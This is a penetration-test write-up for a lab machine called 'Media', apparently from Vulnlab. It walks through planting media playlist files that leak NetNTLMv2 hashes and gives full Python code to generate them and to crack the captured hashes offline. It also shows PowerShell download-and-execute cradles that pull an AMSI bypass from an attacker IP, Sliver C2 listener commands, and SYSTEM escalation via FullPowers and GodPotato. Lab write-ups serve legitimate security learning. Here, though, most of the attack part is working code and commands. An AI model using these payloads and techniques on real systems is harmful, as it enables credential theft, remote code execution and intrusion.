Detailed Findings and Recommendations
The scope of this penetration test is to identify, exploit and report the results of the penetration test performed against the following IP address.
| Machine ID | IPs | Domain | DC |
|---|---|---|---|
| Media | 10.10.126.191 | media.vl | dc.sendai.vl |
Enumeration: Phase-1
Port Scanning
```bash
sudo nmap -sC -sV -oA delegate 10.10.126.191
```
- -sC: runs the default Nmap scripts.
- -sV: detects service versions.
- -oA: writes all three output formats (normal, XML and grepable) with the prefix delegate.

```bash
nmap_results media.nmap
```
nmap_results converts the .nmap output into a Markdown table (the file name passed here must match the -oA prefix used above).
| Port | Service | Version |
|---|---|---|
| 22 | ssh | OpenSSH for_Windows_8.1 |
| 80 | http | Apache httpd 2.4.56 http-title: ProMotion Studio |
| 3389 | ms-wbt-server | Microsoft Terminal Services (rdp-ntlm-info: Target_Name MEDIA, NetBIOS_Domain_Name MEDIA, NetBIOS_Computer_Name MEDIA, DNS_Domain_Name MEDIA, DNS_Computer_Name MEDIA, Product_Version 10.0.20348; ssl-cert: commonName=MEDIA, not valid before 2024-05-22T17:05:26) |
HTTP - Port 80 Enumeration
- Visiting the site.

- The site states that we need to upload a video that is compatible with Windows Media Player.
- A user on the hiring team is presumably going to open that video, which makes the upload a good place to plant a file that forces the viewer's machine to authenticate back to us.
Directory Enumeration
```bash
feroxbuster -k -u http://10.10.126.191 --force-recursion -C 404,405 -m GET,POST -e -x html,js,php,asp
```
-k ignores TLS certificate errors, --force-recursion recurses into every directory found, -C 404,405 filters out those status codes, -m sets the HTTP methods to try, -e extracts links from responses and -x appends the listed extensions to each word.
Resource Development
NTLM theft by uploading a crafted media file: the playlist or metafile points at a UNC path on our host, so when it is opened in Windows Media Player the viewer's machine authenticates to our SMB listener with NTLM.
```bash
python3 ntlm_theft.py -g m3u,wax,asx -s 10.8.2.41 -f media
mv media* ../../vulnlab/media
```
Upload the generated m3u, asx and wax files through the site.
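To show what the generated files actually contain, here is an added Python example (not ntlm_theft's own code) that writes equivalent .m3u, .asx and .wax files referencing a UNC path on the Responder host. The IP, share name and base name are assumptions chosen to match the -s and -f arguments above; any share name works because Responder answers the authentication before the file is ever looked up.

```python
"""Generate Windows Media playlist/metafiles that point at an attacker UNC path.

Added example, not ntlm_theft's own code. When Windows Media Player opens one
of these files it tries to open \\\\<server>\\<share>\\<file> over SMB and sends
the viewer's NetNTLMv2 response to Responder. Server, share and base name are
assumptions chosen to match the write-up's -s and -f arguments.
"""
import xml.etree.ElementTree as ET
from pathlib import Path

ATTACKER_IP = "10.8.2.41"  # assumption: the host running Responder (-s above)
SHARE = "share"            # assumption: Responder answers any share name
BASENAME = "media"         # assumption: matches -f above


def unc_path(server: str, share: str, filename: str) -> str:
    """UNC reference the player will resolve, e.g. \\\\10.8.2.41\\share\\media.wmv."""
    return f"\\\\{server}\\{share}\\{filename}"


def make_m3u(server: str, share: str, basename: str) -> str:
    """Plain-text playlist: every non-comment line is a track, here a UNC path."""
    return "#EXTM3U\n" + unc_path(server, share, basename + ".mp3") + "\n"


def make_metafile(server: str, share: str, target: str, title: str = "Showreel") -> str:
    """ASX and WAX share the same XML metafile format; <ref href> is what WMP follows."""
    root = ET.Element("asx", version="3.0")
    ET.SubElement(root, "title").text = title
    entry = ET.SubElement(root, "entry")
    ET.SubElement(entry, "title").text = title
    ET.SubElement(entry, "ref", href=unc_path(server, share, target))
    return ET.tostring(root, encoding="unicode")


def metafile_ref(metafile: str) -> str:
    """Parse an ASX/WAX document and return the href it would fetch (used for checking)."""
    return ET.fromstring(metafile).find("entry/ref").get("href")


def generate_all(server: str, share: str, basename: str) -> dict:
    """File name -> contents for the three formats the write-up uploads."""
    return {
        f"{basename}.m3u": make_m3u(server, share, basename),
        f"{basename}.asx": make_metafile(server, share, basename + ".wmv"),
        f"{basename}.wax": make_metafile(server, share, basename + ".wma"),
    }


def write_all(outdir: Path, server: str, share: str, basename: str) -> list:
    """Write the payload files to disk and return their paths."""
    outdir.mkdir(parents=True, exist_ok=True)
    paths = []
    for name, body in generate_all(server, share, basename).items():
        path = outdir / name
        path.write_text(body)
        paths.append(path)
    return paths


if __name__ == "__main__":
    for p in write_all(Path("payloads"), ATTACKER_IP, SHARE, BASENAME):
        print("wrote", p)
```

The href is the only part that matters: the target file does not need to exist, because the SMB authentication (and therefore the NetNTLMv2 capture) happens before the server reports whether the file is there.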
With Responder listening on the VPN interface:
```bash
sudo responder -I tun0
```
I started by uploading the asx file first, and after a few seconds I got the NTLMv2 hash.

Save the captured hash to a file and crack it with hashcat; mode 5600 is NetNTLMv2 (recent hashcat versions also autodetect it):
```bash
vim enox_hash
```
```
enox::MEDIA:3060d0ca3bea20bb:5B10AE49938768B664C1B6B96C0803F1:010100000000000000DACE9519ADDA019AD531AFB74B8D6900000000020008004300350041005A0001001E00570049004E002D005400580045004D00510050004100520052003900570004003400570049004E002D005400580045004D0051005000410052005200390057002E004300350041005A002E004C004F00430041004C00030014004300350041005A002E004C004F00430041004C00050014004300350041005A002E004C004F00430041004C000700080000DACE9519ADDA0106000400020000000800300030000000000000000000000000300000424A43341B223890B60CC8DB218973E5076CED7C340B293A6EFBC1906DC6ED800A0010000000000000000000000000000000000009001C0063006900660073002F00310030002E0038002E0032002E00340031000000000000000000
```
```bash
hashcat -m 5600 enox_hash /usr/share/wordlists/rockyou.txt
```
| Username | Password |
|---|---|
| enox | 1234virus@ |
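To make clear what hashcat is actually checking in mode 5600, here is an added Python example (not hashcat's or Responder's code) that re-implements the NetNTLMv2 computation from MS-NLMP and verifies a candidate password against a captured line offline. It carries its own MD4 because hashlib's md4 is unavailable on many OpenSSL 3 builds, and it uses the published MS-NLMP section 4.2.4 test vector (user "User", domain "Domain", password "Password") as constructed sample input; pass a hash file and a wordlist on the command line to run it against enox_hash instead.

```python
"""Check candidate passwords against a NetNTLMv2 line (hashcat mode 5600).

Added example, not hashcat's or Responder's code. NetNTLMv2 per MS-NLMP:
  NTOWFv2    = HMAC-MD5(MD4(UTF-16LE(pw)), UTF-16LE(UPPER(user) + domain))
  NTProofStr = HMAC-MD5(NTOWFv2, server_challenge || blob)
The line layout is  user::domain:server_challenge:NTProofStr:blob  (hex fields).
"""
import hmac
import struct
import sys
from dataclasses import dataclass
from typing import Optional

_M32 = 0xFFFFFFFF


def md4(data: bytes) -> bytes:
    """Pure-Python MD4 (RFC 1320); hashlib's md4 is missing on many OpenSSL 3 builds."""
    def f(x, y, z): return (x & y) | (~x & z)
    def g(x, y, z): return (x & y) | (x & z) | (y & z)
    def h(x, y, z): return x ^ y ^ z
    def rotl(x, n): return ((x << n) | (x >> (32 - n))) & _M32

    msg = bytearray(data) + b"\x80"
    while len(msg) % 64 != 56:
        msg += b"\x00"
    msg += struct.pack("<Q", (len(data) * 8) & 0xFFFFFFFFFFFFFFFF)
    a, b, c, d = 0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476
    for off in range(0, len(msg), 64):
        x = struct.unpack("<16I", msg[off:off + 64])
        aa, bb, cc, dd = a, b, c, d
        for i in range(16):  # round 1: words in order
            a = rotl((a + f(b, c, d) + x[i]) & _M32, (3, 7, 11, 19)[i % 4])
            a, b, c, d = d, a, b, c
        for i in range(16):  # round 2: words 0,4,8,12,1,5,9,13,...
            k = (i % 4) * 4 + i // 4
            a = rotl((a + g(b, c, d) + x[k] + 0x5A827999) & _M32, (3, 5, 9, 13)[i % 4])
            a, b, c, d = d, a, b, c
        for i in range(16):  # round 3: words 0,8,4,12,2,10,6,14,...
            k = (0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15)[i]
            a = rotl((a + h(b, c, d) + x[k] + 0x6ED9EBA1) & _M32, (3, 9, 11, 15)[i % 4])
            a, b, c, d = d, a, b, c
        a, b, c, d = (a + aa) & _M32, (b + bb) & _M32, (c + cc) & _M32, (d + dd) & _M32
    return struct.pack("<4I", a, b, c, d)


def nt_hash(password: str) -> bytes:
    """NTOWFv1: MD4 of the UTF-16LE password (the 'NT hash')."""
    return md4(password.encode("utf-16-le"))


def ntowfv2(password: str, user: str, domain: str) -> bytes:
    """Per-user key: HMAC-MD5 over UPPER(user)+domain, keyed with the NT hash."""
    ident = (user.upper() + domain).encode("utf-16-le")
    return hmac.new(nt_hash(password), ident, "md5").digest()


@dataclass
class NetNtlmV2:
    user: str
    domain: str
    server_challenge: bytes
    nt_proof: bytes
    blob: bytes

    @classmethod
    def parse(cls, line: str) -> "NetNtlmV2":
        parts = line.strip().split(":")
        if len(parts) != 6:
            raise ValueError("expected user::domain:challenge:proof:blob")
        user, _lm, domain, chal, proof, blob = parts
        return cls(user, domain, bytes.fromhex(chal), bytes.fromhex(proof), bytes.fromhex(blob))

    def proof_for(self, password: str) -> bytes:
        key = ntowfv2(password, self.user, self.domain)
        return hmac.new(key, self.server_challenge + self.blob, "md5").digest()

    def check(self, password: str) -> bool:
        return hmac.compare_digest(self.proof_for(password), self.nt_proof)


# Constructed sample input: the MS-NLMP section 4.2.4 test vector (user "User",
# domain "Domain", password "Password", server challenge 0123456789abcdef,
# client challenge aa*8, time 0, target info Domain/Server) in hashcat layout.
MSNLMP_BLOB = ("0101000000000000" "0000000000000000" "aaaaaaaaaaaaaaaa" "00000000"
               "02000c0044006f006d00610069006e00" "01000c00530065007200760065007200"
               "0000000000000000")
MSNLMP_LINE = "User::Domain:0123456789abcdef:68cd0ab851e51c96aabc927bebef6a1c:" + MSNLMP_BLOB


def crack(line: str, candidates) -> Optional[str]:
    """Minimal dictionary attack: first candidate whose proof matches, else None."""
    h = NetNtlmV2.parse(line)
    return next((pw for pw in candidates if h.check(pw)), None)


if __name__ == "__main__":
    # Usage: python netntlmv2_check.py [hashfile] [wordlist]; defaults to the spec vector.
    lines = [MSNLMP_LINE] if len(sys.argv) < 2 else open(sys.argv[1]).read().splitlines()
    words = ["Password"] if len(sys.argv) < 3 else open(sys.argv[2], errors="ignore").read().splitlines()
    for ln in lines:
        if ln.strip():
            print(ln.split(":")[0], "->", crack(ln, words))
```

The blob is sent in the clear and the server challenge is chosen by Responder, so the only secret in the computation is the NT hash; that is why a captured NetNTLMv2 line can be attacked offline with a wordlist but, unlike a plain NT hash, cannot be passed directly.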
Check whether the credentials are valid for the RDP and SSH services:
```bash
cme rdp 10.10.126.191 -u 'enox' -p '1234virus@'
cme ssh 10.10.126.191 -u 'enox' -p '1234virus@'
```

Initial Access
Both open services accept the enox user's credentials:
```bash
xfreerdp /u:enox /p:'1234virus@' /v:10.10.126.191
ssh enox@10.10.126.191
```

Start the Sliver HTTPS listener and the stage listener that serves the compressed, AES-encrypted stage:
```
https -L 10.8.2.41 -l 443
stage-listener --url https://10.8.2.41:8446 --profile vulnhub64 -C deflate9 --aes-encrypt-key D(G+KbPeShVmYq3t6v9y$B&E)H@McQfT --aes-encrypt-iv 8y/B?E(G+KbPeShV
```
Executing the Sliver PowerShell shellcode runner; the AMSI bypass is loaded in memory first:
```powershell
(New-Object System.Net.WebClient).DownloadString('http://10.8.2.41/amsi64.txt') | IEX
```
VL{28ec1c0c64abcc790954f27429fbf5ff}
Privilege Escalation
Method 1 - NTFS Mount Points/ Directory Junctions
The junction technique redirects a directory the low-privileged user can write to (via an NTFS mount point or directory junction) to a location that a more privileged process reads from, so a file we drop is picked up and executed in that process's context. The AMSI bypass is loaded again from the new context:
```powershell
powershell "IEX (New-Object System.Net.WebClient).DownloadString('http://10.8.2.41:80/amsi64.txt')"
```
Increasing the privileges
The shell obtained this way runs as a service account whose token no longer holds SeImpersonatePrivilege (it has been removed or disabled), so the usual potato-style escalation does not work directly. FullPowers, which targets the LOCAL SERVICE and NETWORK SERVICE accounts, re-creates the process with the account's default privilege set and so brings SeImpersonatePrivilege back:
```bash
./FullPowers.exe -c "powershell -ep bypass"
```
With SeImpersonatePrivilege available again, GodPotato (converted to shellcode with donut and run through the Sliver session) is used to escalate to SYSTEM.
VL{dc7871a771551174176b0cc7af8ad3bd}